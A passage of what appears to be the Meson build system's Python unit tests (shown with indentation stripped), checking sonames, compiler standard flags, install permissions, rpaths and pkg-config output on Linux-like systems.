testdir = os.path.join(self.framework_test_dir, '4 qt')
self.init(testdir, extra_args=['-Dmethod=qmake'])
# Confirm that the dependency was found with qmake
mesonlog = self.get_meson_log()
self.assertRegex('\n'.join(mesonlog),
r'Run-time dependency qt5 \(modules: Core\) found: YES .* \((qmake|qmake-qt5)\)\n')
def _test_soname_impl(self, libpath, install):
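# Covers every combination of the version/soversion kwargs to
# shared_library(): neither set, version only, soversion only, both set
# to the same value, and both set to different values. For each case we
# check the files and symlinks produced plus the embedded SONAME.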
if is_cygwin() or is_osx():
raise unittest.SkipTest('Test only applicable to ELF and linuxlike sonames')
testdir = os.path.join(self.unit_test_dir, '1 soname')
self.init(testdir)
self.build()
if install:
self.install()
# File without aliases set.
nover = os.path.join(libpath, 'libnover.so')
self.assertPathExists(nover)
self.assertFalse(os.path.islink(nover))
self.assertEqual(get_soname(nover), 'libnover.so')
self.assertEqual(len(glob(nover[:-3] + '*')), 1)
# File with version set
verset = os.path.join(libpath, 'libverset.so')
self.assertPathExists(verset + '.4.5.6')
self.assertEqual(os.readlink(verset), 'libverset.so.4')
self.assertEqual(get_soname(verset), 'libverset.so.4')
self.assertEqual(len(glob(verset[:-3] + '*')), 3)
# File with soversion set
soverset = os.path.join(libpath, 'libsoverset.so')
self.assertPathExists(soverset + '.1.2.3')
self.assertEqual(os.readlink(soverset), 'libsoverset.so.1.2.3')
self.assertEqual(get_soname(soverset), 'libsoverset.so.1.2.3')
self.assertEqual(len(glob(soverset[:-3] + '*')), 2)
# File with version and soversion set to same values
settosame = os.path.join(libpath, 'libsettosame.so')
self.assertPathExists(settosame + '.7.8.9')
self.assertEqual(os.readlink(settosame), 'libsettosame.so.7.8.9')
self.assertEqual(get_soname(settosame), 'libsettosame.so.7.8.9')
self.assertEqual(len(glob(settosame[:-3] + '*')), 2)
# File with version and soversion set to different values
bothset = os.path.join(libpath, 'libbothset.so')
self.assertPathExists(bothset + '.1.2.3')
self.assertEqual(os.readlink(bothset), 'libbothset.so.1.2.3')
self.assertEqual(os.readlink(bothset + '.1.2.3'), 'libbothset.so.4.5.6')
self.assertEqual(get_soname(bothset), 'libbothset.so.1.2.3')
self.assertEqual(len(glob(bothset[:-3] + '*')), 3)
def test_soname(self):
self._test_soname_impl(self.builddir, False)
def test_installed_soname(self):
libdir = self.installdir + os.path.join(self.prefix, self.libdir)
self._test_soname_impl(libdir, True)
def test_compiler_check_flags_order(self):
'''
Test that compiler check flags override all other flags. This can't be
an ordinary test case because it needs the environment to be set.
'''
testdir = os.path.join(self.common_test_dir, '39 has function')
env = get_fake_env(testdir, self.builddir, self.prefix)
cpp = env.detect_cpp_compiler(MachineChoice.HOST)
Oflag = '-O3'
OflagCPP = Oflag
if cpp.get_id() in ('clang', 'gcc'):
# prevent developers from adding "int main(int argc, char **argv)"
# to small Meson checks unless these parameters are actually used
OflagCPP += ' -Werror=unused-parameter'
env = {'CFLAGS': Oflag,
'CXXFLAGS': OflagCPP}
self.init(testdir, override_envvars=env)
cmds = self.get_meson_log_compiler_checks()
for cmd in cmds:
if cmd[0] == 'ccache':
cmd = cmd[1:]
# Verify that -I flags from the `args` kwarg are first
# This is set in the '39 has function' test case
self.assertEqual(cmd[1], '-I/tmp')
# Verify that -O3 set via the environment is overridden by -O0
Oargs = [arg for arg in cmd if arg.startswith('-O')]
self.assertEqual(Oargs, [Oflag, '-O0'])
def _test_stds_impl(self, testdir, compiler, p: str):
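# Work out which std levels this compiler supports; anything that is not
# clang or gcc is assumed to support them all.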
has_cpp17 = (compiler.get_id() not in {'clang', 'gcc'} or
compiler.get_id() == 'clang' and _clang_at_least(compiler, '>=5.0.0', '>=9.1') or
compiler.get_id() == 'gcc' and version_compare(compiler.version, '>=5.0.0'))
has_cpp2a_c17 = (compiler.get_id() not in {'clang', 'gcc'} or
compiler.get_id() == 'clang' and _clang_at_least(compiler, '>=6.0.0', '>=10.0') or
compiler.get_id() == 'gcc' and version_compare(compiler.version, '>=8.0.0'))
has_c18 = (compiler.get_id() not in {'clang', 'gcc'} or
compiler.get_id() == 'clang' and _clang_at_least(compiler, '>=8.0.0', '>=11.0') or
compiler.get_id() == 'gcc' and version_compare(compiler.version, '>=8.0.0'))
# Check that all the listed -std=xxx options for this compiler work just fine when used
# https://en.wikipedia.org/wiki/Xcode#Latest_versions
# https://www.gnu.org/software/gcc/projects/cxx-status.html
for v in compiler.get_options()['std'].choices:
lang_std = p + '_std'
# we do it like this to handle gnu++17,c++17 and gnu17,c17 cleanly
# thus, C++ first
if '++17' in v and not has_cpp17:
continue
elif '++2a' in v and not has_cpp2a_c17: # https://en.cppreference.com/w/cpp/compiler_support
continue
# now C
elif '17' in v and not has_cpp2a_c17:
continue
elif '18' in v and not has_c18:
continue
std_opt = '{}={}'.format(lang_std, v)
self.init(testdir, extra_args=['-D' + std_opt])
cmd = self.get_compdb()[0]['command']
# c++03 and gnu++03 are not understood by ICC, don't try to look for them
skiplist = frozenset([
('intel', 'c++03'),
('intel', 'gnu++03')])
if v != 'none' and (compiler.get_id(), v) not in skiplist:
cmd_std = " -std={} ".format(v)
self.assertIn(cmd_std, cmd)
try:
self.build()
except Exception:
print('{} was {!r}'.format(lang_std, v))
raise
self.wipe()
# Check that an invalid std option in CFLAGS/CPPFLAGS fails
# Needed because by default ICC ignores invalid options
cmd_std = '-std=FAIL'
if p == 'c':
env_flag_name = 'CFLAGS'
elif p == 'cpp':
env_flag_name = 'CXXFLAGS'
else:
raise NotImplementedError('Language {} not defined.'.format(p))
env = {env_flag_name: cmd_std}
with self.assertRaises((subprocess.CalledProcessError, mesonbuild.mesonlib.EnvironmentException),
msg='C compiler should have failed with -std=FAIL'):
self.init(testdir, override_envvars=env)
# ICC won't fail in the above because additional flags are needed to
# make unknown -std=... options errors.
self.build()
def test_compiler_c_stds(self):
'''
Test that C stds specified for this compiler can all be used. Can't be
an ordinary test because it requires passing options to meson.
'''
testdir = os.path.join(self.common_test_dir, '1 trivial')
env = get_fake_env(testdir, self.builddir, self.prefix)
cc = env.detect_c_compiler(MachineChoice.HOST)
self._test_stds_impl(testdir, cc, 'c')
def test_compiler_cpp_stds(self):
'''
Test that C++ stds specified for this compiler can all be used. Can't
be an ordinary test because it requires passing options to meson.
'''
testdir = os.path.join(self.common_test_dir, '2 cpp')
env = get_fake_env(testdir, self.builddir, self.prefix)
cpp = env.detect_cpp_compiler(MachineChoice.HOST)
self._test_stds_impl(testdir, cpp, 'cpp')
def test_unity_subproj(self):
testdir = os.path.join(self.common_test_dir, '45 subproject')
self.init(testdir, extra_args='--unity=subprojects')
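# Unity sources are emitted into each target's private directory, whose
# name is what Target.construct_id_from_path() computes.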
simpletest_id = Target.construct_id_from_path('subprojects/sublib', 'simpletest', '@exe')
self.assertPathExists(os.path.join(self.builddir, 'subprojects/sublib', simpletest_id, 'simpletest-unity0.c'))
sublib_id = Target.construct_id_from_path('subprojects/sublib', 'sublib', '@sha')
self.assertPathExists(os.path.join(self.builddir, 'subprojects/sublib', sublib_id, 'sublib-unity0.c'))
self.assertPathDoesNotExist(os.path.join(self.builddir, 'user@exe/user-unity.c'))
self.build()
def test_installed_modes(self):
'''
Test that files installed by these tests have the correct permissions.
Can't be an ordinary test because our installed_files.txt is very basic.
'''
# Test file modes
testdir = os.path.join(self.common_test_dir, '12 data')
self.init(testdir)
self.install()
f = os.path.join(self.installdir, 'etc', 'etcfile.dat')
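# stat.filemode() renders st_mode in `ls -l` style, e.g.
# stat.filemode(0o100644) == '-rw-r--r--'; we compare from index 1 so
# only the permission bits, not the file-type character, are checked.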
found_mode = stat.filemode(os.stat(f).st_mode)
want_mode = 'rw------T'
self.assertEqual(want_mode, found_mode[1:])
f = os.path.join(self.installdir, 'usr', 'bin', 'runscript.sh')
statf = os.stat(f)
found_mode = stat.filemode(statf.st_mode)
want_mode = 'rwxr-sr-x'
self.assertEqual(want_mode, found_mode[1:])
if os.getuid() == 0:
# The chown failed nonfatally if we're not root
self.assertEqual(0, statf.st_uid)
self.assertEqual(0, statf.st_gid)
f = os.path.join(self.installdir, 'usr', 'share', 'progname',
'fileobject_datafile.dat')
orig = os.path.join(testdir, 'fileobject_datafile.dat')
statf = os.stat(f)
statorig = os.stat(orig)
found_mode = stat.filemode(statf.st_mode)
orig_mode = stat.filemode(statorig.st_mode)
self.assertEqual(orig_mode[1:], found_mode[1:])
self.assertEqual(os.getuid(), statf.st_uid)
if os.getuid() == 0:
# The chown failed nonfatally if we're not root
self.assertEqual(0, statf.st_gid)
self.wipe()
# Test directory modes
testdir = os.path.join(self.common_test_dir, '62 install subdir')
self.init(testdir)
self.install()
f = os.path.join(self.installdir, 'usr', 'share', 'sub1', 'second.dat')
statf = os.stat(f)
found_mode = stat.filemode(statf.st_mode)
want_mode = 'rwxr-x--t'
self.assertEqual(want_mode, found_mode[1:])
if os.getuid() == 0:
# The chown failed nonfatally if we're not root
self.assertEqual(0, statf.st_uid)
def test_installed_modes_extended(self):
'''
Test that files are installed with correct permissions using install_mode.
'''
testdir = os.path.join(self.common_test_dir, '195 install_mode')
self.init(testdir)
self.build()
self.install()
for fsobj, want_mode in [
('bin', 'drwxr-x---'),
('bin/runscript.sh', '-rwxr-sr-x'),
('bin/trivialprog', '-rwxr-sr-x'),
('include', 'drwxr-x---'),
('include/config.h', '-rw-rwSr--'),
('include/rootdir.h', '-r--r--r-T'),
('lib', 'drwxr-x---'),
('lib/libstat.a', '-rw---Sr--'),
('share', 'drwxr-x---'),
('share/man', 'drwxr-x---'),
('share/man/man1', 'drwxr-x---'),
('share/man/man1/foo.1', '-r--r--r-T'),
('share/sub1', 'drwxr-x---'),
('share/sub1/second.dat', '-rwxr-x--t'),
('subdir', 'drwxr-x---'),
('subdir/data.dat', '-rw-rwSr--'),
]:
f = os.path.join(self.installdir, 'usr', *fsobj.split('/'))
found_mode = stat.filemode(os.stat(f).st_mode)
self.assertEqual(want_mode, found_mode,
msg=('Expected file %s to have mode %s but found %s instead.' %
(fsobj, want_mode, found_mode)))
# Ensure that introspect --installed works on all types of files
# FIXME: also verify the files list
self.introspect('--installed')
def test_install_umask(self):
'''
Test that files are installed with correct permissions using default
install umask of 022, regardless of the umask at the time the worktree
was checked out or the build was executed.
'''
# Copy source tree to a temporary directory and change permissions
# there to simulate a checkout with umask 002.
orig_testdir = os.path.join(self.unit_test_dir, '26 install umask')
# Create a new testdir under tmpdir.
tmpdir = os.path.realpath(tempfile.mkdtemp())
self.addCleanup(windows_proof_rmtree, tmpdir)
testdir = os.path.join(tmpdir, '26 install umask')
# Copy the tree using shutil.copyfile, which will use the current umask
# instead of preserving permissions of the old tree.
save_umask = os.umask(0o002)
self.addCleanup(os.umask, save_umask)
shutil.copytree(orig_testdir, testdir, copy_function=shutil.copyfile)
# Preserve the executable status of subdir/sayhello though.
os.chmod(os.path.join(testdir, 'subdir', 'sayhello'), 0o775)
self.init(testdir)
# Run the build under a 027 umask now.
os.umask(0o027)
self.build()
# And keep umask 027 for the install step too.
self.install()
for executable in [
'bin/prog',
'share/subdir/sayhello',
]:
f = os.path.join(self.installdir, 'usr', *executable.split('/'))
found_mode = stat.filemode(os.stat(f).st_mode)
want_mode = '-rwxr-xr-x'
self.assertEqual(want_mode, found_mode,
msg=('Expected file %s to have mode %s but found %s instead.' %
(executable, want_mode, found_mode)))
for directory in [
'usr',
'usr/bin',
'usr/include',
'usr/share',
'usr/share/man',
'usr/share/man/man1',
'usr/share/subdir',
]:
f = os.path.join(self.installdir, *directory.split('/'))
found_mode = stat.filemode(os.stat(f).st_mode)
want_mode = 'drwxr-xr-x'
self.assertEqual(want_mode, found_mode,
msg=('Expected directory %s to have mode %s but found %s instead.' %
(directory, want_mode, found_mode)))
for datafile in [
'include/sample.h',
'share/datafile.cat',
'share/file.dat',
'share/man/man1/prog.1',
'share/subdir/datafile.dog',
]:
f = os.path.join(self.installdir, 'usr', *datafile.split('/'))
found_mode = stat.filemode(os.stat(f).st_mode)
want_mode = '-rw-r--r--'
self.assertEqual(want_mode, found_mode,
msg=('Expected file %s to have mode %s but found %s instead.' %
(datafile, want_mode, found_mode)))
def test_cpp_std_override(self):
testdir = os.path.join(self.unit_test_dir, '6 std override')
self.init(testdir)
compdb = self.get_compdb()
# Don't try to use -std=c++03 as a check for the
# presence of a compiler flag, as ICC does not
# support it.
for i in compdb:
if 'prog98' in i['file']:
c98_comp = i['command']
if 'prog11' in i['file']:
c11_comp = i['command']
if 'progp' in i['file']:
plain_comp = i['command']
self.assertNotEqual(len(plain_comp), 0)
self.assertIn('-std=c++98', c98_comp)
self.assertNotIn('-std=c++11', c98_comp)
self.assertIn('-std=c++11', c11_comp)
self.assertNotIn('-std=c++98', c11_comp)
self.assertNotIn('-std=c++98', plain_comp)
self.assertNotIn('-std=c++11', plain_comp)
# Now werror
self.assertIn('-Werror', plain_comp)
self.assertNotIn('-Werror', c98_comp)
def test_run_installed(self):
if is_cygwin() or is_osx():
raise unittest.SkipTest('LD_LIBRARY_PATH and RPATH not applicable')
testdir = os.path.join(self.unit_test_dir, '7 run installed')
self.init(testdir)
self.build()
self.install()
installed_exe = os.path.join(self.installdir, 'usr/bin/prog')
installed_libdir = os.path.join(self.installdir, 'usr/foo')
installed_lib = os.path.join(installed_libdir, 'libfoo.so')
self.assertTrue(os.path.isfile(installed_exe))
self.assertTrue(os.path.isdir(installed_libdir))
self.assertTrue(os.path.isfile(installed_lib))
# Must fail when run without LD_LIBRARY_PATH to ensure that
# rpath has been properly stripped rather than pointing to the builddir.
self.assertNotEqual(subprocess.call(installed_exe, stderr=subprocess.DEVNULL), 0)
# When LD_LIBRARY_PATH is set it should start working.
# For some reason setting LD_LIBRARY_PATH in os.environ fails
# when all tests are run (but works when only this test is run),
# but doing this explicitly works.
env = os.environ.copy()
env['LD_LIBRARY_PATH'] = ':'.join([installed_libdir, env.get('LD_LIBRARY_PATH', '')])
self.assertEqual(subprocess.call(installed_exe, env=env), 0)
# Ensure that introspect --installed works
installed = self.introspect('--installed')
for v in installed.values():
self.assertTrue('prog' in v or 'foo' in v)
@skipIfNoPkgconfig
def test_order_of_l_arguments(self):
testdir = os.path.join(self.unit_test_dir, '8 -L -l order')
self.init(testdir, override_envvars={'PKG_CONFIG_PATH': testdir})
# NOTE: .pc file has -Lfoo -lfoo -Lbar -lbar but pkg-config reorders
# the flags before returning them to -Lfoo -Lbar -lfoo -lbar
# but pkgconf seems to not do that. Sigh. Support both.
expected_order = [('-L/me/first', '-lfoo1'),
('-L/me/second', '-lfoo2'),
('-L/me/first', '-L/me/second'),
('-lfoo1', '-lfoo2'),
('-L/me/second', '-L/me/third'),
('-L/me/third', '-L/me/fourth',),
('-L/me/third', '-lfoo3'),
('-L/me/fourth', '-lfoo4'),
('-lfoo3', '-lfoo4'),
]
with open(os.path.join(self.builddir, 'build.ninja')) as ifile:
for line in ifile:
if expected_order[0][0] in line:
for first, second in expected_order:
self.assertLess(line.index(first), line.index(second))
return
raise RuntimeError('Linker entries not found in the Ninja file.')
def test_introspect_dependencies(self):
'''
Tests that mesonintrospect --dependencies returns expected output.
'''
testdir = os.path.join(self.framework_test_dir, '7 gnome')
self.init(testdir)
glib_found = False
gobject_found = False
deps = self.introspect('--dependencies')
self.assertIsInstance(deps, list)
for dep in deps:
self.assertIsInstance(dep, dict)
self.assertIn('name', dep)
self.assertIn('compile_args', dep)
self.assertIn('link_args', dep)
if dep['name'] == 'glib-2.0':
glib_found = True
elif dep['name'] == 'gobject-2.0':
gobject_found = True
self.assertTrue(glib_found)
self.assertTrue(gobject_found)
if subprocess.call(['pkg-config', '--exists', 'glib-2.0 >= 2.56.2']) != 0:
raise unittest.SkipTest('glib >= 2.56.2 needed for the rest')
targets = self.introspect('--targets')
docbook_target = None
for t in targets:
if t['name'] == 'generated-gdbus-docbook':
docbook_target = t
break
self.assertIsInstance(docbook_target, dict)
self.assertEqual(os.path.basename(docbook_target['filename'][0]), 'generated-gdbus-doc-' + os.path.basename(docbook_target['target_sources'][0]['sources'][0]))
def test_introspect_installed(self):
testdir = os.path.join(self.linuxlike_test_dir, '7 library versions')
self.init(testdir)
install = self.introspect('--installed')
install = {os.path.basename(k): v for k, v in install.items()}
print(install)
if is_osx():
the_truth = {
'libmodule.dylib': '/usr/lib/libmodule.dylib',
'libnoversion.dylib': '/usr/lib/libnoversion.dylib',
'libonlysoversion.5.dylib': '/usr/lib/libonlysoversion.5.dylib',
'libonlysoversion.dylib': '/usr/lib/libonlysoversion.dylib',
'libonlyversion.1.dylib': '/usr/lib/libonlyversion.1.dylib',
'libonlyversion.dylib': '/usr/lib/libonlyversion.dylib',
'libsome.0.dylib': '/usr/lib/libsome.0.dylib',
'libsome.dylib': '/usr/lib/libsome.dylib',
}
the_truth_2 = {'/usr/lib/libsome.dylib',
'/usr/lib/libsome.0.dylib',
}
else:
the_truth = {
'libmodule.so': '/usr/lib/libmodule.so',
'libnoversion.so': '/usr/lib/libnoversion.so',
'libonlysoversion.so': '/usr/lib/libonlysoversion.so',
'libonlysoversion.so.5': '/usr/lib/libonlysoversion.so.5',
'libonlyversion.so': '/usr/lib/libonlyversion.so',
'libonlyversion.so.1': '/usr/lib/libonlyversion.so.1',
'libonlyversion.so.1.4.5': '/usr/lib/libonlyversion.so.1.4.5',
'libsome.so': '/usr/lib/libsome.so',
'libsome.so.0': '/usr/lib/libsome.so.0',
'libsome.so.1.2.3': '/usr/lib/libsome.so.1.2.3',
}
the_truth_2 = {'/usr/lib/libsome.so',
'/usr/lib/libsome.so.0',
'/usr/lib/libsome.so.1.2.3'}
self.assertDictEqual(install, the_truth)
targets = self.introspect('--targets')
for t in targets:
if t['name'] != 'some':
continue
self.assertSetEqual(the_truth_2, set(t['install_filename']))
def test_build_rpath(self):
if is_cygwin():
raise unittest.SkipTest('Windows PE/COFF binaries do not use RPATH')
testdir = os.path.join(self.unit_test_dir, '10 build_rpath')
self.init(testdir)
self.build()
# C program RPATH
build_rpath = get_rpath(os.path.join(self.builddir, 'prog'))
self.assertEqual(build_rpath, '$ORIGIN/sub:/foo/bar')
self.install()
install_rpath = get_rpath(os.path.join(self.installdir, 'usr/bin/prog'))
self.assertEqual(install_rpath, '/baz')
# C++ program RPATH
build_rpath = get_rpath(os.path.join(self.builddir, 'progcxx'))
self.assertEqual(build_rpath, '$ORIGIN/sub:/foo/bar')
self.install()
install_rpath = get_rpath(os.path.join(self.installdir, 'usr/bin/progcxx'))
self.assertEqual(install_rpath, 'baz')
@skip_if_not_base_option('b_sanitize')
def test_pch_with_address_sanitizer(self):
if is_cygwin():
raise unittest.SkipTest('asan not available on Cygwin')
if is_openbsd():
raise unittest.SkipTest('-fsanitize=address is not supported on OpenBSD')
testdir = os.path.join(self.common_test_dir, '13 pch')
self.init(testdir, extra_args=['-Db_sanitize=address', '-Db_lundef=false'])
self.build()
compdb = self.get_compdb()
for i in compdb:
self.assertIn("-fsanitize=address", i["command"])
def test_coverage(self):
gcovr_exe, gcovr_new_rootdir = mesonbuild.environment.detect_gcovr()
if not gcovr_exe:
raise unittest.SkipTest('gcovr not found')
if not shutil.which('genhtml') and not gcovr_new_rootdir:
raise unittest.SkipTest('genhtml not found and gcovr is too old')
if 'clang' in os.environ.get('CC', ''):
# We need to use llvm-cov instead of gcovr with clang
raise unittest.SkipTest('Coverage does not work with clang right now, help wanted!')
testdir = os.path.join(self.common_test_dir, '1 trivial')
self.init(testdir, extra_args=['-Db_coverage=true'])
self.build()
self.run_tests()
self.run_target('coverage-html')
def test_cross_find_program(self):
testdir = os.path.join(self.unit_test_dir, '11 cross prog')
crossfile = tempfile.NamedTemporaryFile(mode='w')
crossfile.write(textwrap.dedent('''\
[binaries]
c = '/usr/bin/{1}'
ar = '/usr/bin/ar'
strip = '/usr/bin/ar'
sometool.py = ['{0}']
someothertool.py = '{0}'
[properties]
[host_machine]
system = 'linux'
cpu_family = 'arm'
cpu = 'armv7' # Not sure if correct.
endian = 'little'
''').format(os.path.join(testdir, 'some_cross_tool.py'),
'gcc' if is_sunos() else 'cc'))
crossfile.flush()
self.meson_cross_file = crossfile.name
self.init(testdir)
def test_reconfigure(self):
testdir = os.path.join(self.unit_test_dir, '13 reconfigure')
self.init(testdir, extra_args=['-Db_coverage=true'], default_args=False)
self.build('reconfigure')
def test_vala_generated_source_buildir_inside_source_tree(self):
'''
Test that valac outputs generated C files in the expected location when
the builddir is a subdir of the source tree.
'''
if not shutil.which('valac'):
raise unittest.SkipTest('valac not installed.')
testdir = os.path.join(self.vala_test_dir, '8 generated sources')
newdir = os.path.join(self.builddir, 'srctree')
shutil.copytree(testdir, newdir)
testdir = newdir
# New builddir
builddir = os.path.join(testdir, 'subdir/_build')
os.makedirs(builddir, exist_ok=True)
self.change_builddir(builddir)
self.init(testdir)
self.build()
def test_old_gnome_module_codepaths(self):
'''
A lot of code in the GNOME module is conditional on the version of the
glib tools that are installed, and breakages in the old code can slip
by once the CI has a newer glib version. So we force the GNOME module
to pretend that it's running on an ancient glib so the fallback code is
also tested.
'''
testdir = os.path.join(self.framework_test_dir, '7 gnome')
mesonbuild.modules.gnome.native_glib_version = '2.20'
env = {'MESON_UNIT_TEST_PRETEND_GLIB_OLD': "1"}
try:
self.init(testdir,
inprocess=True,
override_envvars=env)
self.build(override_envvars=env)
finally:
mesonbuild.modules.gnome.native_glib_version = None
@skipIfNoPkgconfig
def test_pkgconfig_usage(self):
testdir1 = os.path.join(self.unit_test_dir, '27 pkgconfig usage/dependency')
testdir2 = os.path.join(self.unit_test_dir, '27 pkgconfig usage/dependee')
if subprocess.call(['pkg-config', '--cflags', 'glib-2.0'],
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL) != 0:
raise unittest.SkipTest('Glib 2.0 dependency not available.')
with tempfile.TemporaryDirectory() as tempdirname:
self.init(testdir1, extra_args=['--prefix=' + tempdirname, '--libdir=lib'], default_args=False)
self.install(use_destdir=False)
shutil.rmtree(self.builddir)
os.mkdir(self.builddir)
pkg_dir = os.path.join(tempdirname, 'lib/pkgconfig')
self.assertTrue(os.path.exists(os.path.join(pkg_dir, 'libpkgdep.pc')))
lib_dir = os.path.join(tempdirname, 'lib')
myenv = os.environ.copy()
myenv['PKG_CONFIG_PATH'] = pkg_dir
# Private internal libraries must not leak out.
pkg_out = subprocess.check_output(['pkg-config', '--static', '--libs', 'libpkgdep'], env=myenv)
self.assertFalse(b'libpkgdep-int' in pkg_out, 'Internal library leaked out.')
# Dependencies must not leak to cflags when building only a shared library.
pkg_out = subprocess.check_output(['pkg-config', '--cflags', 'libpkgdep'], env=myenv)
self.assertFalse(b'glib' in pkg_out, 'Internal dependency leaked to headers.')
# Test that the result is usable.
self.init(testdir2, override_envvars=myenv)
self.build(override_envvars=myenv)
myenv = os.environ.copy()
myenv['LD_LIBRARY_PATH'] = ':'.join([lib_dir, myenv.get('LD_LIBRARY_PATH', '')])
if is_cygwin():
bin_dir = os.path.join(tempdirname, 'bin')
myenv['PATH'] = bin_dir + os.pathsep + myenv['PATH']
self.assertTrue(os.path.isdir(lib_dir))
test_exe = os.path.join(self.builddir, 'pkguser')
self.assertTrue(os.path.isfile(test_exe))
subprocess.check_call(test_exe, env=myenv)
@skipIfNoPkgconfig
def test_pkgconfig_relative_paths(self):
testdir = os.path.join(self.unit_test_dir, '62 pkgconfig relative paths')
pkg_dir = os.path.join(testdir, 'pkgconfig')
self.assertTrue(os.path.exists(os.path.join(pkg_dir, 'librelativepath.pc')))
env = get_fake_env(testdir, self.builddir, self.prefix)
env.coredata.set_options({'pkg_config_path': pkg_dir}, subproject='')
kwargs = {'required': True, 'silent': True}
relative_path_dep = PkgConfigDependency('librelativepath', env, kwargs)
self.assertTrue(relative_path_dep.found())
# Ensure link_args are properly quoted
libpath = Path(self.builddir) / '../relativepath/lib'
link_args = ['-L' + libpath.as_posix(), '-lrelativepath']
self.assertEqual(relative_path_dep.get_link_args(), link_args)
@skipIfNoPkgconfig
def test_pkgconfig_internal_libraries(self):
'''
Check that a static library can be installed together with its generated
pkg-config file and then consumed by a separate application build.
'''
with tempfile.TemporaryDirectory() as tempdirname:
# build library
testdirbase = os.path.join(self.unit_test_dir, '32 pkgconfig use libraries')
testdirlib = os.path.join(testdirbase, 'lib')
self.init(testdirlib, extra_args=['--prefix=' + tempdirname,
'--libdir=lib',
'--default-library=static'], default_args=False)
self.build()
self.install(use_destdir=False)
# build user of library
pkg_dir = os.path.join(tempdirname, 'lib/pkgconfig')
self.new_builddir()
self.init(os.path.join(testdirbase, 'app'),
override_envvars={'PKG_CONFIG_PATH': pkg_dir})
self.build()
@skipIfNoPkgconfig
def test_static_archive_stripping(self):
'''
Check that Meson produces valid static archives with --strip enabled
'''
with tempfile.TemporaryDirectory() as tempdirname:
testdirbase = os.path.join(self.unit_test_dir, '67 static archive stripping')
# build lib
self.new_builddir()
testdirlib = os.path.join(testdirbase, 'lib')
testlibprefix = os.path.join(tempdirname, 'libprefix')
self.init(testdirlib, extra_args=['--prefix=' + testlibprefix,
'--libdir=lib',
'--default-library=static',
'--buildtype=debug',
'--strip'], default_args=False)
self.build()
self.install(use_destdir=False)
# build executable (uses lib, fails if static archive has been stripped incorrectly)
pkg_dir = os.path.join(testlibprefix, 'lib/pkgconfig')
self.new_builddir()
self.init(os.path.join(testdirbase, 'app'),
override_envvars={'PKG_CONFIG_PATH': pkg_dir})
self.build()
@skipIfNoPkgconfig
def test_pkgconfig_formatting(self):
testdir = os.path.join(self.unit_test_dir, '38 pkgconfig format')
self.init(testdir)
myenv = os.environ.copy()
myenv['PKG_CONFIG_PATH'] = self.privatedir
stdo = subprocess.check_output(['pkg-config', '--libs-only-l', 'libsomething'], env=myenv)
deps = [b'-lgobject-2.0', b'-lgio-2.0', b'-lglib-2.0', b'-lsomething']
if is_windows() or is_cygwin() or is_osx() or is_openbsd():
# On Windows, libintl is a separate library
deps.append(b'-lintl')
self.assertEqual(set(deps), set(stdo.split()))
@skipIfNoPkgconfig
@skip_if_not_language('cs')
def test_pkgconfig_csharp_library(self):
testdir = os.path.join(self.unit_test_dir, '50 pkgconfig csharp library')
self.init(testdir)
myenv = os.environ.copy()
myenv['PKG_CONFIG_PATH'] = self.privatedir
stdo = subprocess.check_output(['pkg-config', '--libs', 'libsomething'], env=myenv)
self.assertEqual("-r/usr/lib/libsomething.dll", str(stdo.decode('ascii')).strip())
@skipIfNoPkgconfig
def test_pkgconfig_link_order(self):
'''
Test that libraries are listed before their dependencies.
'''
testdir = os.path.join(self.unit_test_dir, '53 pkgconfig static link order')
self.init(testdir)
myenv = os.environ.copy()
myenv['PKG_CONFIG_PATH'] = self.privatedir
stdo = subprocess.check_output(['pkg-config', '--libs', 'libsomething'], env=myenv)
deps = stdo.split()
self.assertTrue(deps.index(b'-lsomething') < deps.index(b'-ldependency'))
def test_deterministic_dep_order(self):
'''
Test that the dependencies are always listed in a deterministic order.
'''
testdir = os.path.join(self.unit_test_dir, '43 dep order')
self.init(testdir)
with open(os.path.join(self.builddir, 'build.ninja')) as bfile:
for line in bfile:
if 'build myexe:' in line or 'build myexe.exe:' in line:
self.assertIn('liblib1.a liblib2.a', line)
return
raise RuntimeError('Could not find the build rule')
def test_deterministic_rpath_order(self):
'''
Test that the rpaths are always listed in a deterministic order.
'''
if is_cygwin():
raise unittest.SkipTest('rpath are not used on Cygwin')
testdir = os.path.join(self.unit_test_dir, '42 rpath order')
self.init(testdir)
if is_osx():
rpathre = re.compile(r'-rpath,.*/subprojects/sub1.*-rpath,.*/subprojects/sub2')
else:
rpathre = re.compile(r'-rpath,\$\$ORIGIN/subprojects/sub1:\$\$ORIGIN/subprojects/sub2')
with open(os.path.join(self.builddir, 'build.ninja')) as bfile:
for line in bfile:
if '-rpath' in line:
self.assertRegex(line, rpathre)
return
raise RuntimeError('Could not find the rpath')
def test_override_with_exe_dep(self):
'''
Test that we produce the correct dependencies when a program is overridden with an executable.
'''
testdir = os.path.join(self.common_test_dir, '201 override with exe')
self.init(testdir)
with open(os.path.join(self.builddir, 'build.ninja')) as bfile:
for line in bfile:
if 'main1.c:' in line or 'main2.c:' in line:
self.assertIn('| subprojects/sub/foobar', line)
@skipIfNoPkgconfig
def test_usage_external_library(self):
'''
Test that uninstalled usage of an external library (from the system or
PkgConfigDependency) works. On macOS, this workflow works out of the
box. On Linux, BSDs, Windows, etc, you need to set extra arguments such
as LD_LIBRARY_PATH, so the post-install part of this test runs only on macOS.
The system library is found with cc.find_library() and pkg-config deps.
'''
oldprefix = self.prefix
# Install external library so we can find it
testdir = os.path.join(self.unit_test_dir, '40 external, internal library rpath', 'external library')
# install into installdir without using DESTDIR
installdir = self.installdir
self.prefix = installdir
self.init(testdir)
self.prefix = oldprefix
self.build()
self.install(use_destdir=False)
## New builddir for the consumer
self.new_builddir()
env = {'LIBRARY_PATH': os.path.join(installdir, self.libdir),
'PKG_CONFIG_PATH': os.path.join(installdir, self.libdir, 'pkgconfig')}
testdir = os.path.join(self.unit_test_dir, '40 external, internal library rpath', 'built library')
# install into installdir without using DESTDIR
self.prefix = self.installdir
self.init(testdir, override_envvars=env)
self.prefix = oldprefix
self.build(override_envvars=env)
# test uninstalled
self.run_tests(override_envvars=env)
if not is_osx():
# Rest of the workflow only works on macOS
return
# test running after installation
self.install(use_destdir=False)
prog = os.path.join(self.installdir, 'bin', 'prog')
self._run([prog])
out = self._run(['otool', '-L', prog])
self.assertNotIn('@rpath', out)
## New builddir for testing that DESTDIR is not added to install_name
self.new_builddir()
# install into installdir with DESTDIR
self.init(testdir, override_envvars=env)
self.build(override_envvars=env)
# test running after installation
self.install(override_envvars=env)
prog = self.installdir + os.path.join(self.prefix, 'bin', 'prog')
lib = self.installdir + os.path.join(self.prefix, 'lib', 'libbar_built.dylib')
for f in prog, lib:
